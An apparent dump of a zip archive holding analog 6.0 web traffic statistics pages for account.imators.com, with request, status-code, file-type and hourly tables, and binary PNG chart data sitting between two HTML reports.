href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">89</td><td class="P">61</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">98</td><td class="P">37</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">86</td><td class="P">33</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">12</td><td class="P">4</td><td class="xl"> Unknown Windows</td></tr> <tr><td class="N">3</td><td class="R">45</td><td class="P">24</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">45</td><td class="P">24</td><td class="xl"> Linux</td></tr> <tr><td class="N">4</td><td class="R">22</td><td class="P">9</td><td class="xl">Macintosh</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">273</td><td class="xl">200 OK</td></tr> <tr><td class="R">47</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">187</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">20</td><td class="b"> 0.69%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">167</td><td class="b">38.76%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">86</td><td class="b">60.55%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">150</td><td class="b">49.40%</td><td class="xl">[directories]</td></tr> <tr><td class="R">63</td><td class="b">35.40%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">20</td><td class="b">11.03%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">20</td><td class="b"> 3.49%</td><td class="xl">.svg</td></tr> <tr><td class="R">20</td><td class="b"> 0.69%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">103</td><td class="b">49.91%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">150</td><td class="b">49.40%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">20</td><td class="b"> 0.69%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">150</td><td class="b">49.40%</td><td class="D">Mar/23/25 10:06 AM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 8.84%</td><td class="D">Feb/15/25 2:11 PM</td><td class="xl"> <a href="/?54.202.183.123">/?54.202.183.123</a></td></tr> <tr><td class="R">32</td><td class="b"> 4.89%</td><td class="D">Mar/26/25 5:50 AM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">31</td><td class="b">30.51%</td><td class="D">Mar/15/25 12:03 AM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">20</td><td class="b"> 3.49%</td><td class="D">Mar/ 6/25 12:48 AM</td><td class="xl">/_autoindex/assets/icons/folder-fill.svg</td></tr> <tr><td class="R">20</td><td class="b">11.03%</td><td class="D">Mar/ 6/25 12:48 AM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">20</td><td class="b"> 0.69%</td><td class="D">Mar/ 5/25 4:32 PM</td><td class="xl">[not listed: 9 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK J�[��u6� � dir.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx���[r�8P`��O��70��&�V� (�G_>D �7��b(�:�n��c�__�0����C�'o�����PK>?�KK����0�|X�N1�hb�C, �B, �B, �B, �B, �B, �B, �B, �B, ���a�R|v`�b��GV`6c�~�����ǘ�y#�1w��v�n���`�'����ڀ���V_]-k�Xfj��j�Q,m�$�����ҀX��`�n��"�e�Va��F�<�e�T���ܣ�(�^[ŰnM�- k݃ �[��(� �` ��Nc�z��-��`'J�V��X��bŬRX͝���+�%[n��?�WD�X,���t`�聅v>="���a ��k�/vS�����"��U+?�rX���+/�+>��X��5����W.��t7���_��V(Vb`屲ck��;t��):�k���uc��0��[��r��.����ߧP�d �2�(��K��nBV�cX��&X�F���B��M(�J7�˸�qS\=�|��jk���Y�Òg����ae&���ŚK�Je�rK���bM+ׄ2�Vk�X�a5�j������Һ����<�����>���}8Ŋ�v��I K0��X�'�0��m�KЄb�h#N�&g0�.���)˝�t~�걘�Oz�9�&�%�B1VljM�M�\��-f�˻0�%*��_!V��F,_7�̰������+�%+,9V���X� `��b�X� ,���&X� ������X�>\b�/Rt��E ����b � �ֈ��Z�yu.Ǫ)Q,aX��Mǰ���`U_Z�Òv!�U}F�ąa�J�����)�ͦ��`��� ��8�)7a,yaaX��"�V,c����RcKޅV�����L�V�_�*��L�����F��Z�n\�+/A,��@�ui�_g X5U�5X�'��t!�U��4��H�D���ivc�͏Ƃ�ƪ���X@X�b�<���X@�X�Ȃ�*Z���z?��>$b!bYa�O�8V�O��B, ���z?�� O, �B, ��Ă�7`U�tH, ����X�����'_�_�o�a����"# F,@�X�� 1bb�Ĉ��`����`�j�hvT��4SY�J�X@��X@��X@��X@��X@��X@�d�]4�͆ԺBC,$�B, ���>�ӭ�}2$bY��ӇV�#�XH��X@�$�C0N���ɐXH?���>�����X@B?��T��G�����~����A�'Z�\X�BB, �|�'|��=�V2�YU]X�B~G����.$b����IVu���ی�TZu������ʻ0��ۧ�V�E,$1�3���.�b�QZ���D�����0�u|iU_X�B�:�����ѥUaI��>l�SXǖV���:��Z(��a�?�S��R~B]$MV븩����aՈm�������6�0�uLi5�T��X�<!6҄y�#��&`�o�f �X�L,���Na ��N�f&�k_#�ӄ"�]��Pʰv4�wCM(�қ����am[- ,%��8��XJ��il�5��k��j�J��al56������B���:�4ׄԉ�°�Nl��%���{P�X�WmR�XJ�[�49�lP�l+~7K�+݊͝�L�˾�{�[�ڄ�'��r�lIJ\�TU�l�r�h���zU��z��a�R|�c��������������=Y�Y�'O��� zq��y��Wu������^�����q}�A�������j8�R��j�����zZ��c�����q�0�-�2��{s=����ُ��n����XF��V^CX�a���t��W�hvC�o7ޛ��~�U���c��T�؊�6����n��a����`�a��vV�ǽ���ن��3TV�TQ,��}l�R~�����ﴲ��[��6������r����ԣ�Ԉ5����L�Q��|���p��^a��k���z2��������d�ŧ���|��}�� x?��6�>���|���c���� &�N=��������������������2�(����z�� jɟ���M����?H����j,� IEND�B`�PK J�[�8�Ϩ� �� 10.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for account.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://account.imators.com/">account.imators.com</a></h1> <p class="analysisspan">Program started on Fri, Oct 31 2025 at 12:03 PM. <br />Analyzed requests from Sun, Nov 03 2024 at 3:43 PM to Fri, Oct 31 2025 at 9:34 AM (361.74 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Oct 31 2025 at 12:03 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 826 (7) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 538 (7) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 3,346 (218) <br /><span class="gensumtitle">Redirected requests:</span> 17 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 67 (1,421) <br /><span class="gensumtitle">Distinct hosts served:</span> 417 (571) <br /><span class="gensumtitle">Data transferred:</span> 1.05 megabytes (6.00 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 2.98 kilobytes (878 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Nov 2024</td><td class="R">130</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">16</td><td class="P">14</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">55</td><td class="P">29</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">12</td><td class="P">12</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mar 2025</td><td class="R">60</td><td class="P">35</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Apr 2025</td><td class="R">16</td><td class="P">16</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">May 2025</td><td class="R">107</td><td class="P">70</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jun 2025</td><td class="R">71</td><td class="P">39</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Jul 2025</td><td class="R">83</td><td class="P">70</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2025</td><td class="R">115</td><td class="P">65</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sep 2025</td><td class="R">90</td><td class="P">76</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Oct 2025</td><td class="R">71</td><td class="P">52</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Sep 2025 (76 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">136</td><td class="P">87</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">117</td><td class="P">66</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">119</td><td class="P">68</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">91</td><td class="P">63</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">106</td><td class="P">77</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">134</td><td class="P">105</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">123</td><td class="P">72</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">28</td><td class="P">18</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">25</td><td class="P">21</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">15</td><td class="P">14</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">115</td><td class="P">41</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 4</td><td class="R">47</td><td class="P">38</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">16</td><td class="P">12</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">12</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">20</td><td class="P">19</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">17</td><td class="P">17</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 9</td><td class="R">44</td><td class="P">21</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">26</td><td class="P">25</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">21</td><td class="P">18</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">20</td><td class="P">17</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">22</td><td class="P">18</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">14</td><td class="R">36</td><td class="P">31</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">15</td><td class="R">55</td><td class="P">30</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">16</td><td class="R">60</td><td class="P">38</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">60</td><td class="P">28</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">18</td><td class="R">21</td><td class="P">12</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">63</td><td class="P">26</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">32</td><td class="P">26</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">10</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">22</td><td class="R">40</td><td class="P">31</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">21</td><td class="P">17</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">826</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of 